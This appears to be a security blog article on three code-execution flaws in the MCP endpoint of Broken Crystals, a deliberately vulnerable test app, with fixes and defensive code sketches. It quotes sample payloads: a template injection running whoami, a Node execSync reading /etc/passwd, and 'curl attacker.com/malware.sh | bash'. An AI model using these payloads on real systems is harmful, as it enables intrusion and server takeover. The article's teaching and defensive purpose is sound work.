Table of Contents
- Introduction
- Remote Code Execution via render
- Arbitrary Code Execution via process_numbers
- OS-Level Code Execution via spawn_process
- What These Three Paths Have in Common
- How to Prevent Code Execution Through MCP
- Conclusion
Introduction
MCP endpoints are often described as a safe abstraction layer for AI agents – a way to define clear boundaries between what agents can call and what they cannot. But when those boundaries wrap unsafe code execution patterns, they become something else entirely: a structured attack surface for remote code execution.
Broken Crystals demonstrates this risk at scale. Its MCP endpoint exposes tools designed to render content, process data, and execute system operations. Each tool sounds like a legitimate business function. In practice, there are three different pathways to arbitrary code execution on the server.
The critical insight is this: exposing code execution behavior through an agent-callable interface does not make it safer. It makes it more dangerous. Once a tool is documented, discoverable, and invocable through MCP, an attacker no longer needs to find a hidden route or exploit a complex dependency chain. The execution primitive is already available, and the only question is how to invoke it.
Three of the most exploitable tools in Broken Crystals are render, process_numbers, and spawn_process. They look like utility functions. In reality, they create three different paths to running arbitrary code on the server.
1. Remote Code Execution via render
The render tool is exposed as a public MCP capability. Its contract appears straightforward: accept a template string and return rendered output. Under the hood, though, it passes the user-supplied template directly into a server-side rendering engine without sanitization.
That design turns the MCP tool into a code execution primitive. Instead of restricting the caller to a fixed template with predefined variables, it lets the caller decide what template syntax gets executed. For example, the tool can be called with a template string containing a server-side template injection payload such as {{ import('os').popen('whoami').read() }}, or equivalent syntax for the underlying engine, and the response comes back with the command output embedded in the rendered result.
This is a complete remote code execution vulnerability, but MCP makes it frictionless. An AI agent, attacker, or compromised integration does not need to understand the backend rendering engine in detail or find an obscure request parameter. The tool is already documented, the MCP interface is already initialized, and calling it requires only knowing the tool name and passing a malicious template.
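To make the "frictionless" point concrete, here is a minimal sketch of what a tool invocation looks like on the wire. MCP tool calls are JSON-RPC 2.0 requests with the method tools/call. The argument name "template" is an assumption about the render tool's schema, and the payload is a harmless arithmetic probe; whether it evaluates depends on the underlying engine's syntax.

```typescript
// Shape of an MCP tool invocation: a JSON-RPC 2.0 request with method "tools/call".
interface ToolCallRequest {
  jsonrpc: "2.0";
  id: number;
  method: "tools/call";
  params: { name: string; arguments: Record<string, unknown> };
}

// Builds the request body for calling a named tool with the given arguments.
function buildToolCall(
  id: number,
  name: string,
  args: Record<string, unknown>
): ToolCallRequest {
  return { jsonrpc: "2.0", id, method: "tools/call", params: { name, arguments: args } };
}

// Assumption: the render tool reads its input from a field named "template".
// "{{ 7 * 7 }}" is a benign probe; a rendered "49" in the response would
// suggest the template is being evaluated server-side.
const renderProbe = buildToolCall(1, "render", { template: "{{ 7 * 7 }}" });
console.log(JSON.stringify(renderProbe, null, 2));
```

Nothing in this request is specific to the backend. The tool name and the argument shape both come from the tool listing the server itself publishes.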
The fix is not to “validate the template input more carefully.” It is to stop executing user-supplied code as templates at all. MCP tools should accept structured business parameters, such as template names and variable dictionaries, not raw code that will be evaluated server-side.
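One way to sketch that design: the caller picks a template by name from a server-side registry and supplies only variable values. The template names, placeholder syntax, and the renderTemplate function below are hypothetical and are not taken from Broken Crystals.

```typescript
// Hypothetical server-side registry: callers choose a name, never the template body.
const TEMPLATES = new Map<string, string>([
  ["welcome", "Hello, {{name}}! Your order {{orderId}} has shipped."],
  ["reminder", "Hi {{name}}, your appointment is on {{date}}."],
]);

// Escapes characters that are significant in HTML output.
function escapeHtml(value: string): string {
  return value
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}

function renderTemplate(templateName: string, variables: Record<string, string>): string {
  const template = TEMPLATES.get(templateName);
  if (template === undefined) {
    throw new Error(`Unknown template: ${templateName}`);
  }
  // Single-pass string substitution: placeholders are looked up, never evaluated as code.
  return template.replace(/\{\{(\w+)\}\}/g, (_match: string, key: string) => {
    if (!Object.prototype.hasOwnProperty.call(variables, key)) {
      throw new Error(`Missing variable: ${key}`);
    }
    return escapeHtml(String(variables[key]));
  });
}

console.log(renderTemplate("welcome", { name: "Ana", orderId: "42" }));
```

Because substitution happens in a single pass over a server-owned string, a variable value that itself contains template syntax is emitted as text rather than expanded.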
2. Arbitrary Code Execution via process_numbers
If render shows how MCP can enable code execution through template injection, process_numbers shows how it can happen through JavaScript evaluation.
In Broken Crystals, process_numbers is an authenticated MCP tool designed to transform numeric arrays. The implementation accepts a user-supplied JavaScript function string, passes it to eval(), and executes it in the server context. The tool name and description suggest it handles only numeric operations, but in reality it runs arbitrary JavaScript with the full capabilities of the server process.
An attacker with MCP access can call this tool with a payload like function(arr) { require('child_process').execSync('cat /etc/passwd'); return arr; } or similar JavaScript that accesses the full Node.js runtime. The function runs with the privileges of the server process, and any file it can read, any external command it can invoke, or any service it can reach becomes accessible.
This is a common failure mode in AI integrations that accept dynamic code. Teams assume that wrapping the code execution in a tool definition somehow makes it controlled. But once the tool is exposed through MCP, that assumption breaks down. An agent or attacker who can call the tool can escalate to full system compromise.
The lesson is straightforward: never accept code to be evaluated as user input, especially not through an agent-facing interface. If a tool must perform dynamic operations, it should accept declarative parameters that map to a fixed set of safe operations, not arbitrary code that runs in the server context.
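A minimal sketch of the declarative alternative: the caller names an operation, and the server maps that name to a fixed function. The operation names and the processNumbers signature here are illustrative assumptions, not the Broken Crystals API.

```typescript
type NumericOperation = (values: number[]) => number[];

// Fixed set of operations; the caller can select one but cannot define new behavior.
const OPERATIONS = new Map<string, NumericOperation>([
  ["sort", (values: number[]) => values.slice().sort((a, b) => a - b)],
  ["double", (values: number[]) => values.map((v) => v * 2)],
  ["abs", (values: number[]) => values.map((v) => Math.abs(v))],
  ["sum", (values: number[]) => [values.reduce((total, v) => total + v, 0)]],
]);

function processNumbers(operation: unknown, values: unknown): number[] {
  if (typeof operation !== "string") {
    throw new Error("operation must be a string");
  }
  const handler = OPERATIONS.get(operation);
  if (handler === undefined) {
    throw new Error(`Unsupported operation: ${operation}`);
  }
  // Reject anything that is not a plain array of finite numbers.
  if (!Array.isArray(values) || !values.every((v) => typeof v === "number" && Number.isFinite(v))) {
    throw new Error("values must be an array of finite numbers");
  }
  return handler(values as number[]);
}

console.log(processNumbers("sort", [3, 1, 2]));
```

A function string such as the payload described above is simply an unsupported operation name here; it is compared against the map keys and never evaluated.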
3. OS-Level Code Execution via spawn_process
The most direct code execution vulnerability in the MCP layer is spawn_process.
Broken Crystals exposes a utility tool that accepts a command string and optional arguments, then executes them as a system process. The tool returns the process output. The implementation passes these parameters directly to a process spawning function without filtering or restricting the command set.
This is classic OS command injection. An attacker can call spawn_process with arbitrary shell commands. For example, a call with "command": "curl attacker.com/malware.sh | bash" downloads and executes a malicious script on the server in a single call. The MCP interface does nothing to prevent or detect these calls. The command executes with the privileges of the application server, potentially including filesystem write access, network outbound permissions, and the ability to modify system state.
That matters because system process execution is rarely sandboxed in real environments. A tool like this can delete files, exfiltrate data, modify configurations, establish reverse shells, or deploy malware. Once command execution is available through an agent-facing interface, the MCP server has effectively become a remote code execution endpoint.
The right fix is to avoid exposing raw system command execution through MCP entirely. If process invocation is necessary for legitimate business logic, it should be restricted to an allowlist: predefined commands with fixed argument positions, no dynamic command names, and no shell metacharacter expansion.
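As a rough sketch of such an allowlist, the tool can accept an action name plus typed parameters and resolve them to a fixed executable and argument vector. The action names, binary paths, and the resolveCommand helper below are hypothetical; the sketch only builds the command and does not run it.

```typescript
interface CommandSpec {
  file: string; // fixed absolute path, never supplied by the caller
  buildArgs: (params: Record<string, unknown>) => string[];
}

// Conservative hostname pattern: must start and end with an alphanumeric character,
// which also rules out values that begin with "-" and would be read as options.
const HOSTNAME = /^[A-Za-z0-9](?:[A-Za-z0-9.-]{0,251}[A-Za-z0-9])?$/;

// Hypothetical allowlist: each action maps to one executable and fixed argument positions.
const ALLOWED_COMMANDS = new Map<string, CommandSpec>([
  ["disk_usage", { file: "/bin/df", buildArgs: () => ["-h"] }],
  [
    "ping_host",
    {
      file: "/bin/ping",
      buildArgs: (params: Record<string, unknown>) => {
        const host = params["host"];
        if (typeof host !== "string" || !HOSTNAME.test(host)) {
          throw new Error("invalid host");
        }
        return ["-c", "1", host];
      },
    },
  ],
]);

function resolveCommand(
  action: string,
  params: Record<string, unknown>
): { file: string; args: string[] } {
  const spec = ALLOWED_COMMANDS.get(action);
  if (spec === undefined) {
    throw new Error(`Action not allowed: ${action}`);
  }
  return { file: spec.file, args: spec.buildArgs(params) };
}

console.log(resolveCommand("ping_host", { host: "example.com" }));
```

In a Node.js server, the resolved file and args could then be passed to execFile from node:child_process, which does not spawn a shell by default, so characters such as | and ; in an argument are not interpreted as shell syntax.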
What These Three Paths Have in Common
These vulnerabilities are different technically, but they share the same architectural problem: MCP is wrapping code execution primitives in a discoverable interface built for automation.
render leaks through template injection. process_numbers leaks through JavaScript evaluation. spawn_process leaks through command-line execution. In each case, the underlying vulnerability – server-side code execution – is familiar. What changes with MCP is the delivery mechanism. Dangerous functionality becomes easier to find, easier to invoke, and easier to chain into larger attack flows.
An agent that can call render can compromise the server. An agent that can call process_numbers can steal secrets. An agent that can call spawn_process can take full control. From a defensive perspective, the critical difference between these tools and a hidden vulnerability in the backend is that these tools are part of the published MCP contract. Testing them is part of the standard integration flow.
That is why MCP endpoints need their own code execution review, not just inherited trust from the APIs behind them. Once a tool is published to an agent, it becomes part of the attack surface.
How to Prevent Code Execution Through MCP
Start with the basics, but apply them at the MCP layer itself.
Do not expose template engines as tool parameters. Do not accept code to be evaluated as user input. Do not expose raw system command execution. Treat every tool definition as a privilege decision, every MCP session as its own trust boundary, and every agent invocation as a potential attack.
More specifically: if a tool sounds like it “executes” something – whether it is rendering, processing, spawning, or evaluating – it is a red flag. Tools should describe high-level business operations, not low-level code execution. If you need dynamic behavior, implement it as fixed code paths, not as user-supplied instructions that the tool then runs.
Most importantly, test MCP directly for code execution paths. Broken Crystals is valuable because it demonstrates these vulnerabilities end-to-end: tool enumeration, argument construction, invocation, execution, and output capture. That is the level where real agent security problems appear – not in isolation, but in the actual tool-calling flow.
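The enumeration step can be partly automated. The sketch below takes tool definitions in the shape returned by an MCP tools/list call (name, description, inputSchema) and flags those whose names or parameter names hint at execution. The keyword lists are a crude heuristic chosen for illustration, and the parameter names in the sample data are assumptions, not the actual Broken Crystals schemas. A flag is a prompt for manual review, not proof of a vulnerability.

```typescript
interface ToolDefinition {
  name: string;
  description?: string;
  inputSchema?: { properties?: Record<string, unknown> };
}

interface Finding {
  name: string;
  reasons: string[];
}

// Illustrative heuristics only; tune these for your own tool catalog.
const RISKY_NAME = /(exec|eval|spawn|render|shell|script)/i;
const RISKY_PARAMS = new Set([
  "template", "code", "command", "cmd", "script", "expression", "function",
]);

function flagRiskyTools(tools: ToolDefinition[]): Finding[] {
  const findings: Finding[] = [];
  for (const tool of tools) {
    const reasons: string[] = [];
    if (RISKY_NAME.test(tool.name)) {
      reasons.push("tool name suggests execution");
    }
    const paramNames = Object.keys(tool.inputSchema?.properties ?? {});
    for (const param of paramNames) {
      if (RISKY_PARAMS.has(param.toLowerCase())) {
        reasons.push(`parameter "${param}" may carry code or commands`);
      }
    }
    if (reasons.length > 0) {
      findings.push({ name: tool.name, reasons });
    }
  }
  return findings;
}

// Sample listing with assumed parameter names.
const sampleTools: ToolDefinition[] = [
  { name: "render", inputSchema: { properties: { template: {} } } },
  { name: "process_numbers", inputSchema: { properties: { numbers: {}, function: {} } } },
  { name: "spawn_process", inputSchema: { properties: { command: {}, args: {} } } },
  { name: "get_count", inputSchema: { properties: { product_id: {} } } },
];
console.log(flagRiskyTools(sampleTools).map((f) => f.name));
```

Each flagged tool should then be exercised through the real tool-calling flow, since only an actual invocation shows whether the input reaches an interpreter or a process launcher.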
Conclusion
Code execution vulnerabilities through MCP do not require a new class of AI-specific attack. They happen when existing dangerous behavior is exposed through an interface designed for discovery, automation, and chained execution. That makes familiar weaknesses far more practical to exploit.
For teams adopting MCP, the takeaway is clear: treat code execution as a special case in agent-facing integrations. If a tool can execute code of any kind, it should not be exposed through MCP at all. Review what your tools execute, eliminate unnecessary execution primitives, and test carefully for injection.
If security validation stops at the underlying API layer and does not extend to the MCP tools themselves, the most critical risks may still be sitting in the agent-facing interface above it.